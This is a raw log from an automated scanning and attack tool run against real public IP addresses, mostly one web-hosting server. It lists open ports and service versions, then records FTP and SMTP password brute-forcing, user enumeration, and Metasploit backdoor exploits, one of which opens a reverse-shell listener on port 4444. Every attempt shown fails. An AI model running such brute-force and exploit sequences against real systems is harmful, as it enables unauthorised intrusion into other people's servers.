3917104.244.79.89 16221 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
3918104.244.79.89 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
3919111.90.145.39 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 15:04. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
3920111.90.145.39 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
3921111.90.145.39 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
3922111.90.145.39 67 tcp dhcps closed
3923111.90.145.39 67 udp dhcps closed
3924111.90.145.39 68 tcp dhcpc closed
3925111.90.145.39 68 udp dhcpc unknown
3926111.90.145.39 69 tcp tftp closed
3927111.90.145.39 69 udp tftp unknown
3928111.90.145.39 88 tcp kerberos-sec closed
3929111.90.145.39 88 udp kerberos-sec unknown
3930111.90.145.39 123 tcp ntp closed
3931111.90.145.39 123 udp ntp closed
3932111.90.145.39 137 tcp netbios-ns closed
3933111.90.145.39 137 udp netbios-ns unknown
3934111.90.145.39 138 tcp netbios-dgm closed
3935111.90.145.39 138 udp netbios-dgm unknown
3936111.90.145.39 139 tcp netbios-ssn filtered
3937111.90.145.39 139 udp netbios-ssn closed
3938111.90.145.39 161 tcp snmp closed
3939111.90.145.39 161 udp snmp unknown
3940111.90.145.39 162 tcp snmptrap closed
3941111.90.145.39 162 udp snmptrap closed
3942111.90.145.39 389 tcp ldap closed
3943111.90.145.39 389 udp ldap unknown
3944111.90.145.39 520 tcp efs closed
3945111.90.145.39 520 udp route closed
3946111.90.145.39 2049 tcp nfs closed
3947111.90.145.39 2049 udp nfs closed
3948149.126.72.220 25 tcp smtp closed
3949149.126.72.220 51 tcp tcpwrapped open
3950149.126.72.220 53 tcp domain open
3951149.126.72.220 53 udp domain open
3952149.126.72.220 65 tcp tcpwrapped open
3953149.126.72.220 66 tcp tcpwrapped open
3954149.126.72.220 67 tcp dhcps filtered
3955149.126.72.220 67 udp dhcps unknown
3956149.126.72.220 68 tcp dhcpc filtered
3957149.126.72.220 68 udp dhcpc unknown
3958149.126.72.220 69 tcp tftp filtered
3959149.126.72.220 69 udp tftp unknown
3960149.126.72.220 80 tcp tcpwrapped open
3961149.126.72.220 81 tcp tcpwrapped open
3962149.126.72.220 82 tcp tcpwrapped open
3963149.126.72.220 83 tcp tcpwrapped open
3964149.126.72.220 84 tcp tcpwrapped open
3965149.126.72.220 85 tcp tcpwrapped open
3966149.126.72.220 86 tcp tcpwrapped open
3967149.126.72.220 88 tcp http open Incapsula CDN httpd
3968149.126.72.220 88 udp kerberos-sec unknown
3969149.126.72.220 89 tcp tcpwrapped open
3970149.126.72.220 90 tcp tcpwrapped open
3971149.126.72.220 91 tcp tcpwrapped open
3972149.126.72.220 92 tcp tcpwrapped open
3973149.126.72.220 98 tcp tcpwrapped open
3974149.126.72.220 99 tcp tcpwrapped open
3975149.126.72.220 123 tcp ntp filtered
3976149.126.72.220 123 udp ntp unknown
3977149.126.72.220 137 tcp netbios-ns filtered
3978149.126.72.220 137 udp netbios-ns filtered
3979149.126.72.220 138 tcp netbios-dgm filtered
3980149.126.72.220 138 udp netbios-dgm filtered
3981149.126.72.220 139 tcp netbios-ssn closed
3982149.126.72.220 139 udp netbios-ssn unknown
3983149.126.72.220 160 tcp sgmp-traps closed
3984149.126.72.220 161 tcp snmp filtered
3985149.126.72.220 161 udp snmp unknown
3986149.126.72.220 162 tcp snmptrap filtered
3987149.126.72.220 162 udp snmptrap unknown
3988149.126.72.220 189 tcp tcpwrapped open
3989149.126.72.220 190 tcp tcpwrapped open
3990149.126.72.220 192 tcp tcpwrapped open
3991149.126.72.220 243 tcp tcpwrapped open
3992149.126.72.220 285 tcp tcpwrapped open
3993149.126.72.220 314 tcp tcpwrapped open
3994149.126.72.220 343 tcp tcpwrapped open
3995149.126.72.220 347 tcp tcpwrapped open
3996149.126.72.220 385 tcp tcpwrapped open
3997149.126.72.220 389 tcp ssl/http open Incapsula CDN httpd
3998149.126.72.220 389 udp ldap unknown
3999149.126.72.220 400 tcp tcpwrapped open
4000149.126.72.220 440 tcp tcpwrapped open
4001149.126.72.220 441 tcp tcpwrapped open
4002149.126.72.220 442 tcp tcpwrapped open
4003149.126.72.220 443 tcp ssl/tcpwrapped open
4004149.126.72.220 444 tcp tcpwrapped open
4005149.126.72.220 445 tcp microsoft-ds closed
4006149.126.72.220 446 tcp tcpwrapped open
4007149.126.72.220 447 tcp tcpwrapped open
4008149.126.72.220 448 tcp tcpwrapped open
4009149.126.72.220 449 tcp tcpwrapped open
4010149.126.72.220 452 tcp tcpwrapped open
4011149.126.72.220 461 tcp tcpwrapped open
4012149.126.72.220 462 tcp tcpwrapped open
4013149.126.72.220 480 tcp tcpwrapped open
4014149.126.72.220 485 tcp tcpwrapped open
4015149.126.72.220 487 tcp tcpwrapped open
4016149.126.72.220 488 tcp tcpwrapped open
4017149.126.72.220 491 tcp tcpwrapped open
4018149.126.72.220 520 tcp efs filtered
4019149.126.72.220 520 udp route unknown
4020149.126.72.220 555 tcp tcpwrapped open
4021149.126.72.220 556 tcp tcpwrapped open
4022149.126.72.220 587 tcp tcpwrapped open
4023149.126.72.220 631 tcp tcpwrapped open
4024149.126.72.220 632 tcp tcpwrapped open
4025149.126.72.220 636 tcp tcpwrapped open
4026149.126.72.220 743 tcp tcpwrapped open
4027149.126.72.220 772 tcp tcpwrapped open
4028149.126.72.220 777 tcp tcpwrapped open
4029149.126.72.220 782 tcp tcpwrapped open
4030149.126.72.220 785 tcp tcpwrapped open
4031149.126.72.220 800 tcp tcpwrapped open
4032149.126.72.220 801 tcp tcpwrapped open
4033149.126.72.220 805 tcp tcpwrapped open
4034149.126.72.220 806 tcp tcpwrapped open
4035149.126.72.220 809 tcp tcpwrapped open
4036149.126.72.220 843 tcp tcpwrapped open
4037149.126.72.220 853 tcp tcpwrapped open
4038149.126.72.220 885 tcp tcpwrapped open
4039149.126.72.220 886 tcp tcpwrapped open
4040149.126.72.220 887 tcp tcpwrapped open
4041149.126.72.220 888 tcp tcpwrapped open
4042149.126.72.220 943 tcp tcpwrapped open
4043149.126.72.220 947 tcp tcpwrapped open
4044149.126.72.220 953 tcp tcpwrapped open
4045149.126.72.220 990 tcp tcpwrapped open
4046149.126.72.220 995 tcp tcpwrapped open
4047149.126.72.220 998 tcp tcpwrapped open
4048149.126.72.220 999 tcp tcpwrapped open
4049149.126.72.220 1000 tcp tcpwrapped open
4050149.126.72.220 1002 tcp tcpwrapped open
4051149.126.72.220 1024 tcp tcpwrapped open
4052149.126.72.220 1025 tcp tcpwrapped open
4053149.126.72.220 1028 tcp tcpwrapped open
4054149.126.72.220 1080 tcp tcpwrapped open
4055149.126.72.220 1103 tcp tcpwrapped open
4056149.126.72.220 1111 tcp tcpwrapped open
4057149.126.72.220 1180 tcp tcpwrapped open
4058149.126.72.220 1181 tcp tcpwrapped open
4059149.126.72.220 1207 tcp tcpwrapped open
4060149.126.72.220 1234 tcp tcpwrapped open
4061149.126.72.220 1250 tcp tcpwrapped open
4062149.126.72.220 1283 tcp tcpwrapped open
4063149.126.72.220 1291 tcp tcpwrapped open
4064149.126.72.220 1292 tcp tcpwrapped open
4065149.126.72.220 1293 tcp tcpwrapped open
4066149.126.72.220 1337 tcp tcpwrapped open
4067149.126.72.220 1344 tcp tcpwrapped open
4068149.126.72.220 1355 tcp tcpwrapped open
4069149.126.72.220 1364 tcp tcpwrapped open
4070=======================================
4071 GATHERING DNS INFO
4072=======================================
4073dnsenum VERSION:1.2.6
4074
4075----- 111.90.145.39 -----
4076
4077
4078Host's addresses:
4079__________________
4080
4081
4082
4083Name Servers:
4084______________
4085
4086=======================================
4087 CHECKING FOR SUBDOMAIN HIJACKING
4088=======================================
4089
4090=======================================
4091 PINGING HOST
4092=======================================
4093PING 111.90.145.39 (111.90.145.39) 56(84) bytes of data.
409464 bytes from 111.90.145.39: icmp_seq=1 ttl=43 time=484 ms
4095
4096--- 111.90.145.39 ping statistics ---
40971 packets transmitted, 1 received, 0% packet loss, time 0ms
4098rtt min/avg/max/mdev = 484.398/484.398/484.398/0.000 ms
4099
4100=======================================
4101 RUNNING TCP PORT SCAN
4102=======================================
4103Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 01:58 EST
4104Warning: 111.90.145.39 giving up on port because retransmission cap hit (2).
4105Nmap scan report for web16.support-emilid.com (111.90.145.39)
4106Host is up (0.33s latency).
4107Not shown: 458 closed ports, 4 filtered ports
4108Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
4109PORT STATE SERVICE VERSION
411021/tcp open ftp Pure-FTPd
4111| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
4112| Not valid before: 2019-05-03T09:49:26
4113|_Not valid after: 2046-09-17T09:49:26
4114|_ssl-date: 2020-02-29T06:56:27+00:00; -4m17s from scanner time.
411525/tcp open smtp Exim smtpd 4.92
4116| smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
4117|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
4118| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4119| Not valid before: 2016-05-13T00:34:32
4120|_Not valid after: 2043-09-28T00:34:32
4121|_ssl-date: 2020-02-29T06:56:27+00:00; -4m17s from scanner time.
412253/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4123| dns-nsid:
4124|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
412580/tcp open ssl/http Apache/2
4126|_http-server-header: Apache/2
4127|_http-title: Site doesn't have a title (text/html).
4128110/tcp open pop3 Dovecot DirectAdmin pop3d
4129|_pop3-capabilities: PIPELINING STLS AUTH-RESP-CODE UIDL RESP-CODES TOP USER SASL(PLAIN) CAPA
4130| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4131| Not valid before: 2016-05-13T00:34:32
4132|_Not valid after: 2043-09-28T00:34:32
4133|_ssl-date: 2020-02-29T06:56:25+00:00; -4m17s from scanner time.
4134111/tcp open rpcbind 2-4 (RPC #100000)
4135| rpcinfo:
4136| program version port/proto service
4137| 100000 2,3,4 111/tcp rpcbind
4138| 100000 2,3,4 111/udp rpcbind
4139| 100000 3,4 111/tcp6 rpcbind
4140| 100000 3,4 111/udp6 rpcbind
4141| 100024 1 35598/tcp status
4142| 100024 1 43746/tcp6 status
4143| 100024 1 48690/udp6 status
4144|_ 100024 1 56252/udp status
4145143/tcp open imap Dovecot imapd
4146|_imap-capabilities: listed IDLE STARTTLS ID capabilities more ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS have IMAP4rev1 LITERAL+ post-login Pre-login OK SASL-IR
4147| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4148| Not valid before: 2016-05-13T00:34:32
4149|_Not valid after: 2043-09-28T00:34:32
4150|_ssl-date: 2020-02-29T06:56:26+00:00; -4m17s from scanner time.
4151443/tcp open ssl/ssl Apache httpd (SSL-only mode)
4152|_http-server-header: Apache/2
4153|_http-title: 400 Bad Request
4154| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
4155| Not valid before: 2019-05-03T09:49:26
4156|_Not valid after: 2046-09-17T09:49:26
4157|_ssl-date: 2020-02-29T06:56:25+00:00; -4m17s from scanner time.
4158465/tcp open ssl/smtp Exim smtpd 4.92
4159|_smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
4160| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4161| Not valid before: 2016-05-13T00:34:32
4162|_Not valid after: 2043-09-28T00:34:32
4163|_ssl-date: 2020-02-29T06:56:24+00:00; -4m17s from scanner time.
4164587/tcp open smtp Exim smtpd 4.92
4165| smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
4166|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
4167| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4168| Not valid before: 2016-05-13T00:34:32
4169|_Not valid after: 2043-09-28T00:34:32
4170|_ssl-date: 2020-02-29T06:56:25+00:00; -4m17s from scanner time.
4171993/tcp open ssl/imap Dovecot imapd
4172| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4173| Not valid before: 2016-05-13T00:34:32
4174|_Not valid after: 2043-09-28T00:34:32
4175|_ssl-date: 2020-02-29T06:56:24+00:00; -4m17s from scanner time.
4176995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d
4177| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
4178| Not valid before: 2016-05-13T00:34:32
4179|_Not valid after: 2043-09-28T00:34:32
4180|_ssl-date: 2020-02-29T06:56:24+00:00; -4m17s from scanner time.
41812222/tcp open http DirectAdmin httpd 1.59.5 (Registered to Shinjiru Technology Sdn. Bhd.)
4182|_http-title: DirectAdmin Login
4183|_http-trane-info: Problem with XML parsing of /evox/about
41843306/tcp open mysql MySQL (unauthorized)
4185Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.1 (94%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.10 (94%), Linux 3.2 (94%), HP P2000 G3 NAS device (93%), Linux 3.8 (93%), Linux 2.6.32 - 3.10 (92%)
4186No exact OS matches for host (test conditions non-ideal).
4187Network Distance: 25 hops
4188Service Info: Host: server98222.domain.local; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4189
4190Host script results:
4191|_clock-skew: mean: -4m17s, deviation: 0s, median: -4m17s
4192
4193TRACEROUTE (using port 21/tcp)
4194HOP RTT ADDRESS
41951 129.31 ms 10.203.15.1
41962 ...
41973 132.79 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
41984 132.68 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
41995 135.88 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
42006 157.68 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
42017 162.75 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
42028 250.74 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
42039 248.58 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
420410 247.98 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
420511 245.75 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
420612 263.07 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
420713 275.51 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
420814 295.55 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
420915 298.71 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
421016 316.89 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
421117 318.95 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
421218 313.92 ms 38.104.210.82
421319 480.83 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
421420 482.06 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
421521 485.68 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
421622 480.86 ms 124.158.230.70
421723 493.83 ms 111.90.128.46
421824 496.05 ms 172.16.16.2
421925 496.06 ms web16.support-emilid.com (111.90.145.39)
4220
4221OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4222Nmap done: 1 IP address (1 host up) scanned in 181.87 seconds
4223=======================================
4224 RUNNING UDP PORT SCAN
4225=======================================
4226Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:01 EST
4227Nmap scan report for web16.support-emilid.com (111.90.145.39)
4228Host is up (0.32s latency).
4229Not shown: 19 closed ports, 1 filtered port
4230Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
4231PORT STATE SERVICE VERSION
423253/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
423353/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4234| dns-nsid:
4235|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
423668/udp open|filtered dhcpc
423788/udp open|filtered kerberos-sec
4238137/udp open|filtered netbios-ns
4239138/udp open|filtered netbios-dgm
4240161/udp open|filtered snmp
4241389/udp open|filtered ldap
4242Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.10 (94%), Linux 3.2 (94%), HP P2000 G3 NAS device (93%), Linux 3.5 (93%), Linux 3.8 (93%)
4243No exact OS matches for host (test conditions non-ideal).
4244Network Distance: 25 hops
4245Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4246
4247TRACEROUTE (using port 53/tcp)
4248HOP RTT ADDRESS
42491 134.60 ms 10.203.15.1
42502 ...
42513 131.43 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
42524 136.17 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
42535 142.11 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
42546 160.00 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
42557 161.48 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
42568 254.65 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
42579 250.34 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
425810 248.16 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
425911 249.95 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
426012 260.36 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
426113 274.59 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
426214 273.83 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
426315 293.92 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
426416 303.38 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
426517 314.80 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
426618 318.09 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
426719 480.55 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
426820 480.53 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
426921 480.73 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
427022 475.33 ms 124.158.230.70
427123 487.12 ms 111.90.128.46
427224 490.11 ms 172.16.16.2
427325 485.37 ms web16.support-emilid.com (111.90.145.39)
4274
4275OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4276Nmap done: 1 IP address (1 host up) scanned in 181.27 seconds
4277
4278=======================================
4279 RUNNING INTRUSIVE SCANS
4280=======================================
4281 + -- --=[Port 21 opened... running tests...
4282=======================================
4283 RUNNING NMAP PORT 21 SCRIPTS
4284=======================================
4285Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:05 EST
4286NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
4287NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
4288NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
4289Nmap scan report for web16.support-emilid.com (111.90.145.39)
4290Host is up (0.32s latency).
4291
4292PORT STATE SERVICE VERSION
429321/tcp open ftp Pure-FTPd
4294| ftp-brute:
4295| Accounts: No valid accounts found
4296|_ Statistics: Performed 1232 guesses in 191 seconds, average tps: 7.9
4297Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4298Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.5 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.11 (94%), Linux 3.1 (94%)
4299No exact OS matches for host (test conditions non-ideal).
4300Network Distance: 25 hops
4301
4302TRACEROUTE (using port 21/tcp)
4303HOP RTT ADDRESS
43041 130.21 ms 10.203.15.1
43052 ...
43063 133.70 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
43074 130.01 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
43085 135.80 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
43096 156.61 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
43107 159.58 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
43118 251.08 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
43129 248.69 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
431310 247.71 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
431411 249.51 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
431512 263.28 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
431613 276.20 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
431714 290.07 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
431815 302.88 ms be2930.ccr32.phx01.atlas.cogentco.com (154.54.42.77)
431916 312.32 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
432017 318.52 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
432118 319.22 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
432219 318.99 ms 38.104.210.82
432320 481.15 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
432421 477.89 ms 61.11.210.114
432522 481.13 ms 61.11.210.114
432623 482.91 ms 111.90.128.46
432724 487.73 ms 172.16.16.2
432825 483.11 ms web16.support-emilid.com (111.90.145.39)
4329
4330OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4331Nmap done: 1 IP address (1 host up) scanned in 212.21 seconds
4332=======================================
4333 RUNNING METASPLOIT FTP VERSION SCANNER
4334=======================================
4335RHOST => 111.90.145.39
4336RHOSTS => 111.90.145.39
4337[+] 111.90.145.39:21 - FTP Banner: '220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 15:04. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a'
4338[*] 111.90.145.39:21 - Scanned 1 of 1 hosts (100% complete)
4339[*] Auxiliary module execution completed
4340=======================================
4341 RUNNING METASPLOIT ANONYMOUS FTP SCANNER
4342=======================================
4343RHOST => 111.90.145.39
4344RHOSTS => 111.90.145.39
4345[*] 111.90.145.39:21 - Scanned 1 of 1 hosts (100% complete)
4346[*] Auxiliary module execution completed
4347=======================================
4348 RUNNING VSFTPD 2.3.4 BACKDOOR EXPLOIT
4349=======================================
4350RHOST => 111.90.145.39
4351RHOSTS => 111.90.145.39
4352[*] 111.90.145.39:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
4353220-You are user number 1 of 50 allowed.
4354220-Local time is now 15:04. Server port: 21.
4355220-This is a private system - No anonymous login
4356220-IPv6 connections are also welcome on this server.
4357220 You will be disconnected after 15 minutes of inactivity.
4358[*] 111.90.145.39:21 - USER: 331 User 2Lb:) OK. Password required
4359[*] Exploit completed, but no session was created.
4360=======================================
4361 RUNNING PROFTPD 1.3.3C BACKDOOR EXPLOIT
4362=======================================
4363RHOST => 111.90.145.39
4364RHOSTS => 111.90.145.39
4365[*] Started reverse TCP double handler on 10.203.15.37:4444
4366[*] 111.90.145.39:21 - Sending Backdoor Command
4367[*] Exploit completed, but no session was created.
4368 + -- --=[Port 22 closed... skipping.
4369 + -- --=[Port 23 closed... skipping.
4370 + -- --=[Port 25 opened... running tests...
4371=======================================
4372 RUNNING NMAP PORT 25 SCRIPTS
4373=======================================
4374Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:09 EST
4375NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
4376NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
4377NSE: [smtp-brute] passwords: Time limit 3m00s exceeded.
4378Nmap scan report for web16.support-emilid.com (111.90.145.39)
4379Host is up (0.32s latency).
4380
4381PORT STATE SERVICE VERSION
438225/tcp open smtp Exim smtpd 4.92
4383| smtp-brute:
4384| Accounts: No valid accounts found
4385|_ Statistics: Performed 901 guesses in 182 seconds, average tps: 4.6
4386| smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
4387|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
4388| smtp-enum-users:
4389|_ Couldn't find any accounts
4390|_smtp-open-relay: SMTP RSET: failed to receive data: connection closed
4391| smtp-vuln-cve2010-4344:
4392| Exim version: 4.92
4393| Exim heap overflow vulnerability (CVE-2010-4344):
4394| Exim (CVE-2010-4344): NOT VULNERABLE
4395| Exim privileges escalation vulnerability (CVE-2010-4345):
4396| Exim (CVE-2010-4345): NOT VULNERABLE
4397|_ To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit'
4398Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4399Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 2.6.32 - 3.1 (94%), Linux 3.11 (94%), Linux 3.8 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%)
4400No exact OS matches for host (test conditions non-ideal).
4401Network Distance: 25 hops
4402Service Info: Host: server98222.domain.local
4403
4404TRACEROUTE (using port 25/tcp)
4405HOP RTT ADDRESS
44061 130.89 ms 10.203.15.1
44072 ...
44083 129.93 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
44094 133.82 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
44105 135.43 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
44116 155.70 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
44127 168.22 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
44138 255.47 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
44149 258.31 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
441510 258.48 ms be2318.ccr32.bio02.atlas.cogentco.com (154.54.61.117)
441611 258.10 ms be2332.ccr41.iad02.atlas.cogentco.com (154.54.85.245)
441712 250.80 ms be3084.ccr42.dca01.atlas.cogentco.com (154.54.30.65)
441813 264.94 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
441914 287.08 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
442015 299.97 ms be2930.ccr32.phx01.atlas.cogentco.com (154.54.42.77)
442116 314.89 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
442217 316.36 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
442318 314.35 ms 38.104.210.82
442419 481.19 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
442520 481.37 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
442621 481.48 ms 61.11.210.114
442722 484.32 ms 61.11.210.114
442823 484.24 ms 111.90.128.46
442924 486.83 ms 111.90.128.46
443025 481.40 ms web16.support-emilid.com (111.90.145.39)
4431
4432OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4433Nmap done: 1 IP address (1 host up) scanned in 205.89 seconds
4434=======================================
4435 RUNNING SMTP USER ENUM
4436=======================================
4437RHOSTS => 111.90.145.39
4438RHOST => 111.90.145.39
4439[*] 111.90.145.39:25 - 111.90.145.39:25 Banner: 220 server98222.domain.local ESMTP Exim 4.92 Sat, 29 Feb 2020 15:08:30 +0800
4440[*] 111.90.145.39:25 - Scanned 1 of 1 hosts (100% complete)
4441[*] Auxiliary module execution completed
4442 + -- --=[Port 53 opened... running tests...
4443=======================================
4444 RUNNING NMAP PORT 53 SCRIPTS
4445=======================================
